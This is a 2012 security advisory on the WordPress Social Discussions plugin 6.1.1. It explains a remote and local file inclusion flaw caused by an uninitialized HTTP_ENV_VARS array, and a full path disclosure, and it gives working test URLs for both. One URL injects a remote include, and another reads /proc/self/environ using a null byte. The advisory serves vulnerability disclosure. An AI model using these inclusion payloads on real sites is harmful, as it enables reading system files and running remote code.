[waraxe-2012-SA#093] - Multiple Vulnerabilities in WordPress Social Discussions Plugin======================================================================================
Author: Janek Vind "waraxe"
Date:17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html
Description of vulnerable target:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+
Networks.
http://wordpress.org/extend/plugins/social-discussions/
Affected version:6.1.1###############################################################################1. Remote File Inclusion in"social-discussions-networkpub_ajax.php"###############################################################################
Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:1. register_globals=on
2. register_long_arrays=off
3. allow_url_include=on for RFI if PHP >=5.2.04. PHP must be <5.3.4for LFI null-byte attacks
5. magic_quotes_gpc=off for LFI null-byte attacks
Php script "social-discussions-networkpub_ajax.php" line 2:------------------------[ source code start ]----------------------------------if(!function_exists('add_action')){@include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT']."/wp-config.php");------------------------[ source code end ]------------------------------------
We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive
"register_long_arrays=off", then "HTTP_ENV_VARS"is uninitialized andifin
same time "register_globals=on", it is possible to fill that array withany
value, leading to the RFI (Remote File Inclusion) vulnerability.
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z
###############################################################################2. Full Path Disclosure in multiple scripts
###############################################################################
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php
Fatal error: Call to undefined function __()in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php
Fatal error: Call to undefined function __()in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php
Fatal error: Call to undefined function __()in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3
Contact:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum:http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/----------------------------------[ EOF ]------------------------------------
